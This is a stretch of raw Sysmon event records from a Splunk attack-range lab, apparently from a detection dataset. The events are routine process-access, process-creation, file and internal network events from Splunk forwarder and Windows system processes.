11:21:59.602{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C6C1D69B303EFBDE120E3B7AC468725,SHA256=4D618EE0F79C1D8B5A059CE5846BBC9774D127191B0AC726F166CE7F9A3C26F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:59.565{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=879B8804312A20011545058E7D6810CE,SHA256=B7A8C94A6B54FC6CF7F321056385BCF299A9DDE01B18A41F563E61D656F78A90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222316Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:00.836{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF04CD19523BFDB54EBE0351E62575B0,SHA256=C94F5D21C9519B7795FB446F885ADA94F16F28C294014E84696ABCEE53C8A375,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:00.580{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2074587F87C4010FCD06D0D277C5B9A,SHA256=9A34F36A904CD11D2F1A6930F84CFFC3C4C953BB756395706B2B5F045ECD4E9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.981{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.971{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-18D9-6216-5407-000000003802}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.968{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-18D9-6216-5407-000000003802}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.965{C8EA50B7-18D9-6216-5407-000000003802}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.664{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15C6C070D259887FE52AF5A2A83652AB,SHA256=44DF18EC0F4D9FA1E6B2AEE7F0022E219E83ACED606307CE4A05CD491FF98099,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.410{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-18D9-6216-5307-000000003802}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.410{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.410{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.410{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.410{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.410{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-18D9-6216-5307-000000003802}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.410{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-18D9-6216-5307-000000003802}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.412{C8EA50B7-18D9-6216-5307-000000003802}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:02.675{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C8B42B951E5D58CB1705F4FBCD90FFA,SHA256=13B5C6D8487074BB3080CC7613920B342CD5558FF2B24BE7A1D495707A7C5C1A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222318Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:00.635{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51708-false10.0.1.12-8000- 23542300x8000000000000000222317Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:02.071{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52D333CDB13DFAE6336A2721DFCB4214,SHA256=04D538FB8559D6EFC6070D4FD8394700E02A962E41B7A51D1B7E0FF593E89872,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:02.475{C8EA50B7-18D9-6216-5407-000000003802}49366252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.995{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-18D9-6216-5407-000000003802}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.982{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.982{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.982{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000298445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:01.689{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49531-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000298444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:03.737{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-18DB-6216-5507-000000003802}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:03.737{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:03.737{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:03.737{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:03.737{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:03.737{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-18DB-6216-5507-000000003802}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:03.737{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program 